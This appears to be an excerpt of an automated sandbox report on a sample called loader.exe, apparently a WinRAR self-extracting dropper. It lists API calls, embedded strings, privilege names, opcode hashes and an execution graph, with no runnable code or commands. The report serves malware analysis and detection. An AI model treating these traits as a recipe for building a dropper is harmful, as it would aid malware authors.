                                                                                    • Opcode ID: 10d45d905cf5c6b1f153aa3c43829892897ddf323edeeb66c7c32f31f571e3ed
                                                                                    • Instruction ID: 6d2fdbf66f9d26c5c82a5dd6020b0f5fd81c6923a219b9ff475861f2ad23e878
                                                                                    • Opcode Fuzzy Hash: 10d45d905cf5c6b1f153aa3c43829892897ddf323edeeb66c7c32f31f571e3ed
                                                                                    • Instruction Fuzzy Hash: 80417A2650036199D735AF748852ABBB3EBEF41764F10090EF9D27B2C1EB614E82D3D9
                                                                                    APIs
                                                                                      • Part of subcall function 0063B690: _wcslen.LIBCMT ref: 0063B696
                                                                                    • _swprintf.LIBCMT ref: 0064CED1
                                                                                      • Part of subcall function 00634092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 006340A5
                                                                                    • SetDlgItemTextW.USER32(?,00000066,0067946A), ref: 0064CEF1
                                                                                    • _wcschr.LIBVCRUNTIME ref: 0064CF22
                                                                                    • EndDialog.USER32(?,00000001), ref: 0064CFFE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: DialogItemText__vswprintf_c_l_swprintf_wcschr_wcslen
                                                                                    • String ID: %s%s%u
                                                                                    • API String ID: 3419047066-1360425832
                                                                                    • Opcode ID: 7021b74e99074cccc0bf62e7524521d19013539118f767b2287b99e613a18f3b
                                                                                    • Instruction ID: e46cdc16e587e71298022d304a4f77ffd16ceabd8edab4eb73edead416143cb7
                                                                                    • Opcode Fuzzy Hash: 7021b74e99074cccc0bf62e7524521d19013539118f767b2287b99e613a18f3b
                                                                                    • Instruction Fuzzy Hash: 0C418071900218AADF65DF90CC45AEE77FEEB06350F4080A6FA09E7251EE749A84CF65
                                                                                    APIs
                                                                                    • _wcschr.LIBVCRUNTIME ref: 0064CD84
                                                                                      • Part of subcall function 0064AF98: _wcschr.LIBVCRUNTIME ref: 0064B033
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmp
                                                                                    Similarity
                                                                                    • API ID: _wcschr
                                                                                    • String ID: <$HIDE$MAX$MIN
                                                                                    • API String ID: 2691759472-3358265660
                                                                                    APIs
                                                                                      • Part of subcall function 00631316: GetDlgItem.USER32(00000000,00003021), ref: 0063135A
                                                                                      • Part of subcall function 00631316: SetWindowTextW.USER32(00000000,006635F4), ref: 00631370
                                                                                    • EndDialog.USER32(?,00000001), ref: 0064B2BE
                                                                                    • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 0064B2D6
                                                                                    • SetDlgItemTextW.USER32(?,00000067,?), ref: 0064B304
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: ItemText$DialogWindow
                                                                                    • String ID: GETPASSWORD1$xzh
                                                                                    • API String ID: 445417207-1351821969
                                                                                    APIs
                                                                                    • _swprintf.LIBCMT ref: 0063B9B8
                                                                                      • Part of subcall function 00634092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 006340A5
                                                                                    • _wcschr.LIBVCRUNTIME ref: 0063B9D6
                                                                                    • _wcschr.LIBVCRUNTIME ref: 0063B9E6
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: _wcschr$__vswprintf_c_l_swprintf
                                                                                    • String ID: %c:\
                                                                                    • API String ID: 525462905-3142399695
                                                                                    APIs
                                                                                    • LoadBitmapW.USER32(00000065), ref: 0064B6ED
                                                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 0064B712
                                                                                    • DeleteObject.GDI32(00000000), ref: 0064B744
                                                                                    • DeleteObject.GDI32(00000000), ref: 0064B767
                                                                                      • Part of subcall function 0064A6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 0064A762
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: Object$Delete$BitmapCreateGlobalLoadStream
                                                                                    • String ID: ]
                                                                                    • API String ID: 3658976889-3352871620
                                                                                    APIs
                                                                                      • Part of subcall function 00631316: GetDlgItem.USER32(00000000,00003021), ref: 0063135A
                                                                                      • Part of subcall function 00631316: SetWindowTextW.USER32(00000000,006635F4), ref: 00631370
                                                                                    • EndDialog.USER32(?,00000001), ref: 0064D64B
                                                                                    • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 0064D661
                                                                                    • SetDlgItemTextW.USER32(?,00000066,?), ref: 0064D675
                                                                                    • SetDlgItemTextW.USER32(?,00000068), ref: 0064D684
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: ItemText$DialogWindow
                                                                                    • String ID: RENAMEDLG
                                                                                    • API String ID: 445417207-3299779563
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: AdjustPointer$_abort
                                                                                    • String ID:
                                                                                    • API String ID: 2252061734-0
                                                                                    APIs
                                                                                    • _free.LIBCMT ref: 0065C817
                                                                                      • Part of subcall function 00658DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0065C896,00663A34,00000000,00663A34,00000000,?,0065C8BD,00663A34,00000007,00663A34,?,0065CCBA,00663A34), ref: 00658DE2
                                                                                    • _free.LIBCMT ref: 0065C829
                                                                                    • _free.LIBCMT ref: 0065C83B
                                                                                    • _free.LIBCMT ref: 0065C84D
                                                                                    • _free.LIBCMT ref: 0065C85F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: _free$FreeHeap
                                                                                    • String ID:
                                                                                    • API String ID: 2929853658-0
                                                                                    APIs
                                                                                    • _free.LIBCMT ref: 0065891E
                                                                                      • Part of subcall function 00658DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0065C896,00663A34,00000000,00663A34,00000000,?,0065C8BD,00663A34,00000007,00663A34,?,0065CCBA,00663A34), ref: 00658DE2
                                                                                    • _free.LIBCMT ref: 00658930
                                                                                    • _free.LIBCMT ref: 00658943
                                                                                    • _free.LIBCMT ref: 00658954
                                                                                    • _free.LIBCMT ref: 00658965
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmp
                                                                                    Similarity
                                                                                    • API ID: _free$FreeHeap
                                                                                    • String ID:
                                                                                    • API String ID: 2929853658-0
                                                                                    APIs
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: _swprintf
                                                                                    • String ID: %ls$%s: %s
                                                                                    • API String ID: 589789837-2259941744
                                                                                    APIs
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: _wcslen
                                                                                    • String ID: UNC$\\?\
                                                                                    • API String ID: 176396367-253988292
                                                                                    APIs
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: _free
                                                                                    • String ID: (!i$C:\Users\user\Desktop\loader.exe
                                                                                    • API String ID: 269201875-3028609708
                                                                                    APIs
                                                                                      • Part of subcall function 00631316: GetDlgItem.USER32(00000000,00003021), ref: 0063135A
                                                                                      • Part of subcall function 00631316: SetWindowTextW.USER32(00000000,006635F4), ref: 00631370
                                                                                    • EndDialog.USER32(?,00000001), ref: 0064AD98
                                                                                    • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 0064ADAD
                                                                                    • SetDlgItemTextW.USER32(?,00000066,?), ref: 0064ADC2
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: ItemText$DialogWindow
                                                                                    • String ID: ASKNEXTVOL
                                                                                    • API String ID: 445417207-3402441367
                                                                                    APIs
                                                                                    • DialogBoxParamW.USER32(GETPASSWORD1,00010406,0064B270,?,?), ref: 0064DE18
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: DialogParam
                                                                                    • String ID: GETPASSWORD1$rd$xzh
                                                                                    • API String ID: 665744214-2584188523
                                                                                    APIs
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: __fprintf_l_strncpy
                                                                                    • String ID: $%s$@%s
                                                                                    • API String ID: 1857242416-834177443
                                                                                    APIs
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: Malloc
                                                                                    • String ID: (d$2d$A
                                                                                    • API String ID: 2696272793-223122361
                                                                                    • Opcode ID: f1865d8c6af75766a0e0f7f721aa94003862d3c920d22afe0d25e8e606251497
                                                                                    • Instruction ID: 716e0696d540ff0bc9540622b8572b231c27f2baf1b868b416f059ca6dd86d8b
                                                                                    • Opcode Fuzzy Hash: f1865d8c6af75766a0e0f7f721aa94003862d3c920d22afe0d25e8e606251497
                                                                                    • Instruction Fuzzy Hash: E10109B1D01229ABCB14CFA4D8449DFBBF9AF09300F10415AE905E7300D775DB40CB94
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                    • API String ID: 0-56093855
                                                                                    • Opcode ID: 22f63794b58caedd1bd0647ebed9cc6bf97f1b4694552e5bbf6fa88d90ab5739
                                                                                    • Instruction ID: 395d9274c4cbca8af46294ea0e4632e35ed4290dd2d99ac5a6c67f0ff5899a5a
                                                                                    • Opcode Fuzzy Hash: 22f63794b58caedd1bd0647ebed9cc6bf97f1b4694552e5bbf6fa88d90ab5739
                                                                                    • Instruction Fuzzy Hash: AA017176E44255AFDB158F58FC4899A7FABFB49394B002426F809D3330DA719C90DBA0
                                                                                    APIs
                                                                                      • Part of subcall function 0063E2E8: _swprintf.LIBCMT ref: 0063E30E
                                                                                      • Part of subcall function 0063E2E8: _strlen.LIBCMT ref: 0063E32F
                                                                                      • Part of subcall function 0063E2E8: SetDlgItemTextW.USER32(?,0066E274,?), ref: 0063E38F
                                                                                      • Part of subcall function 0063E2E8: GetWindowRect.USER32(?,?), ref: 0063E3C9
                                                                                      • Part of subcall function 0063E2E8: GetClientRect.USER32(?,?), ref: 0063E3D5
                                                                                    • GetDlgItem.USER32(00000000,00003021), ref: 0063135A
                                                                                    • SetWindowTextW.USER32(00000000,006635F4), ref: 00631370
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                                                    • String ID: d$0
                                                                                    • API String ID: 2622349952-997102099
                                                                                    • Opcode ID: 20db5e78375be370b687a3a6310722b7f7e12aa32ccbfd8f42ec714b2ed6b96f
                                                                                    • Instruction ID: f98b62a0e179ba0a93ec03262afa6ed9ebb6a888c25415aa8919641070c4049d
                                                                                    • Opcode Fuzzy Hash: 20db5e78375be370b687a3a6310722b7f7e12aa32ccbfd8f42ec714b2ed6b96f
                                                                                    • Instruction Fuzzy Hash: DFF04F30104298ABEF151F648C0DBEA3F5BAF46344F048119FC4999AA1CB75CA99EB90
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: __alldvrm$_strrchr
                                                                                    • String ID:
                                                                                    • API String ID: 1036877536-0
                                                                                    • Opcode ID: 2cd596ac5c756e306358c357791e272077258f0312558ab394eda4628d4e1c95
                                                                                    • Instruction ID: b086ea05f95d9d07388d5aa051f5a7b7f3bfc04abbefbf35ca57fb591a950858
                                                                                    • Opcode Fuzzy Hash: 2cd596ac5c756e306358c357791e272077258f0312558ab394eda4628d4e1c95
                                                                                    • Instruction Fuzzy Hash: ACA12472904786DFEB25CF28C8917AEBBE6EF51311F1841ADEC859B381C2388949C764
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: _com_issue_error
                                                                                    • String ID:
                                                                                    • API String ID: 2162355165-0
                                                                                    • Opcode ID: 7bfafe9ddf4f4534fc7ffb5955bd20e39b69b04226782b1e60ba0e3889266ef8
                                                                                    • Instruction ID: 831f7394e532d413b6a875710b266d23e8e162372db0a52f3b52a6f55bb9f4cf
                                                                                    • Opcode Fuzzy Hash: 7bfafe9ddf4f4534fc7ffb5955bd20e39b69b04226782b1e60ba0e3889266ef8
                                                                                    • Instruction Fuzzy Hash: 7141C771A00219BBDB109F68CC45BAFBBAAEF45711F10423EF915E7391D7749900C7A5
                                                                                    APIs
                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00652B16
                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00652B2F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: Value___vcrt_
                                                                                    • String ID:
                                                                                    • API String ID: 1426506684-0
                                                                                    • Opcode ID: 883b9c7665dad11d30999f4d7b8838f0ad46d3e4405095db36af1c2fcf4bafea
                                                                                    • Instruction ID: 56896ab84a88a10697e17b3da3ccda6d59f69fd91130d7441e8a2ce8aa781f0b
                                                                                    • Opcode Fuzzy Hash: 883b9c7665dad11d30999f4d7b8838f0ad46d3e4405095db36af1c2fcf4bafea
                                                                                    • Instruction Fuzzy Hash: 5A01D83A1083236EA7552E747C959562F67EF12BBBF60173DFD10552E0FF525C089148
                                                                                    APIs
                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0064DC61
                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0064DC72
                                                                                    • TranslateMessage.USER32(?), ref: 0064DC7C
                                                                                    • DispatchMessageW.USER32(?), ref: 0064DC86
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: Message$DispatchPeekTranslate
                                                                                    • String ID:
                                                                                    • API String ID: 4217535847-0
                                                                                    • Opcode ID: 7942b8d8b8676606da03720fb2e57c787c70c5b846d4ee908aad0d761dba9856
                                                                                    • Instruction ID: e8dbd936ed95f7929667f7c34f54d9fe066fa9dd040dc8f674dbc9186c03cea1
                                                                                    • Opcode Fuzzy Hash: 7942b8d8b8676606da03720fb2e57c787c70c5b846d4ee908aad0d761dba9856
                                                                                    • Instruction Fuzzy Hash: 9FF0EC72A01229BBCB206FA5DD4DDDB7F7EEF42791B004012F50AD2261D675964AC7A0
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcslen
                                                                                    • String ID:
                                                                                    • API String ID: 176396367-0
                                                                                    • Opcode ID: bb2dc3ff197378b2127c352ba583229af0b64438ced83d5025292da9cfcca5d5
                                                                                    • Instruction ID: fc37031593e43939704f188bf132c1b2daa717c089168a8fe079198628263b87
                                                                                    • Opcode Fuzzy Hash: bb2dc3ff197378b2127c352ba583229af0b64438ced83d5025292da9cfcca5d5
                                                                                    • Instruction Fuzzy Hash: 3DF06232408024BBCF221F90EC09D8A7F67DB41B61F21800AF9155B161CB729A65D694
                                                                                    APIs
                                                                                    • GetDC.USER32(00000000), ref: 0064A666
                                                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 0064A675
                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0064A683
                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 0064A691
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: CapsDevice$Release
                                                                                    • String ID:
                                                                                    • API String ID: 1035833867-0
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: _wcschr
                                                                                    • String ID: .lnk$dd
                                                                                    • API String ID: 2691759472-4022110313
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: _free
                                                                                    • String ID: *?$.
                                                                                    • API String ID: 269201875-3972193922
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 00639387
                                                                                      • Part of subcall function 0063C29A: _wcslen.LIBCMT ref: 0063C2A2
                                                                                    • _swprintf.LIBCMT ref: 00639465
                                                                                      • Part of subcall function 00634092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 006340A5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: H_prolog__vswprintf_c_l_swprintf_wcslen
                                                                                    • String ID: rtmp%d
                                                                                    • API String ID: 1262143012-3303766350
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: _wcschr
                                                                                    • String ID: *
                                                                                    • API String ID: 2691759472-163128923
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: _abort
                                                                                    • String ID: MOC$RCC
                                                                                    • API String ID: 1888311480-2084237596
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 00637406
                                                                                      • Part of subcall function 00633BBA: __EH_prolog.LIBCMT ref: 00633BBF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: H_prolog
                                                                                    • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                                    • API String ID: 3519838083-639343689
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: _wcslen
                                                                                    • String ID: }
                                                                                    • API String ID: 176396367-4239843852
                                                                                    • Opcode ID: ca7077411cbf74d8bab5c417b96e5df80a3451c7baa8504416be511720d55a2a
                                                                                    • Instruction ID: 9a569ec6cd825267c1e492fd5575765d36cecf5d85f3ac6ea2156bc1b66c34f5
                                                                                    • Opcode Fuzzy Hash: ca7077411cbf74d8bab5c417b96e5df80a3451c7baa8504416be511720d55a2a
                                                                                    • Instruction Fuzzy Hash: 4A21F07290431A5AD735EF68D845EABB3EEDF91750F04142EF940C3341EB65DD4883A6
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcslen
                                                                                    • String ID: Software\WinRAR SFX$d
                                                                                    • API String ID: 176396367-4033024366
                                                                                    • Opcode ID: 6d09adb76ca96b4a5fe8f2292424542c353bccf5514896f0e857f518a122be77
                                                                                    • Instruction ID: 408f10e70a689fac787fdce98bee2cc0adbd2236435b05d7b6412174e35c719a
                                                                                    • Opcode Fuzzy Hash: 6d09adb76ca96b4a5fe8f2292424542c353bccf5514896f0e857f518a122be77
                                                                                    • Instruction Fuzzy Hash: 10018B71900128BAEB219F91DC0AFDF7FBEEB45790F004056B509A11A0D7B18A88CBA1
                                                                                    APIs
                                                                                      • Part of subcall function 0063C29A: _wcslen.LIBCMT ref: 0063C2A2
                                                                                      • Part of subcall function 00641FDD: _wcslen.LIBCMT ref: 00641FE5
                                                                                      • Part of subcall function 00641FDD: _wcslen.LIBCMT ref: 00641FF6
                                                                                      • Part of subcall function 00641FDD: _wcslen.LIBCMT ref: 00642006
                                                                                      • Part of subcall function 00641FDD: _wcslen.LIBCMT ref: 00642014
                                                                                      • Part of subcall function 0064AC04: SetCurrentDirectoryW.KERNELBASE(?), ref: 0064AC08
                                                                                    • _wcslen.LIBCMT ref: 0064AE8B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcslen$CurrentDirectory
                                                                                    • String ID: <d$C:\Users\user\Desktop
                                                                                    • API String ID: 3341907918-478003630
                                                                                    • Opcode ID: b854f2c1344c7832eeaae4fb4366ccaf3fecd9230ff46c71d668a2847295297d
                                                                                    • Instruction ID: e39d08bea5476c48c5655e613f19ec7b6ad69a89b457200b05552406e0717054
                                                                                    • Opcode Fuzzy Hash: b854f2c1344c7832eeaae4fb4366ccaf3fecd9230ff46c71d668a2847295297d
                                                                                    • Instruction Fuzzy Hash: 2D014471D40229A6DF51ABE4DD0AEDF77FEAF09700F00045AF606E3191E6B49684CBA9
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: Malloc
                                                                                    • String ID: (d$Zd
                                                                                    • API String ID: 2696272793-2178031859
                                                                                    • Opcode ID: 9820b57c93299213c19e17db2e59769bb60e1e0f079cd134ad513e6c2a4cef57
                                                                                    • Instruction ID: ce3be0bfe547da4b473ebc8677cf8c9321213c2f36c2c6911b6cc05d9b724e6a
                                                                                    • Opcode Fuzzy Hash: 9820b57c93299213c19e17db2e59769bb60e1e0f079cd134ad513e6c2a4cef57
                                                                                    • Instruction Fuzzy Hash: 490146B6600118FF9F059FB0DC49CEEBBAEEF08344700115AB906D7220E631AA44DBA0

                                                                                    Execution Graph

                                                                                    Execution Coverage:9.2%
                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                    Signature Coverage:0%
                                                                                    Total number of Nodes:4
                                                                                    Total number of Limit Nodes:0
                                                                                    execution_graph 8130 7ffd347eecf1 8131 7ffd347eed66 8130->8131 8131->8131 8132 7ffd347eee3b QueryFullProcessImageNameA 8131->8132 8133 7ffd347eeeb4 8132->8133

                                                                                    Control-flow Graph

                                                                                    control_flow_graph 257 7ffd343f0d48-7ffd343f0e41 call 7ffd343f07d8 270 7ffd343f0e59-7ffd343f0eb9 257->270 276 7ffd343f0ebb-7ffd343f0f05 270->276 277 7ffd343f0e52-7ffd343f0e58 270->277 281 7ffd343f0f07-7ffd343f0f1d 276->281 282 7ffd343f0f1e 276->282 277->270 281->282 283 7ffd343f0f1f-7ffd343f0f67 281->283 282->283 288 7ffd343f0f6f-7ffd343f1050 283->288
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2361395915.00007FFD343F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ffd343f0000_chainPorthostCommon.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 5Y_H
                                                                                    • API String ID: 0-3237497481
                                                                                    • Opcode ID: 61bb9639e054a4800ac786bfe74dfe1dc80ff006459b42e6c6e7711cca5ca787
                                                                                    • Instruction ID: 612147881d73cfebae2849f1b401293db5723d75177cd1ee31620a3c64e4e48c
                                                                                    • Opcode Fuzzy Hash: 61bb9639e054a4800ac786bfe74dfe1dc80ff006459b42e6c6e7711cca5ca787
                                                                                    • Instruction Fuzzy Hash: 2291AF76A18A898FE759EB6C88657F97FE1FB96310F4001BFD049D72D2CE7918158700
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2361395915.00007FFD343F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ffd343f0000_chainPorthostCommon.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ff479655eaa78f25bde5bb6171f506b4df4e4240a6acc775a42093cc68e09bc7
                                                                                    • Instruction ID: 4ff94b81999ad5d94e92c8a8af5a88065f1810b379ff56134eff1e8259710d20
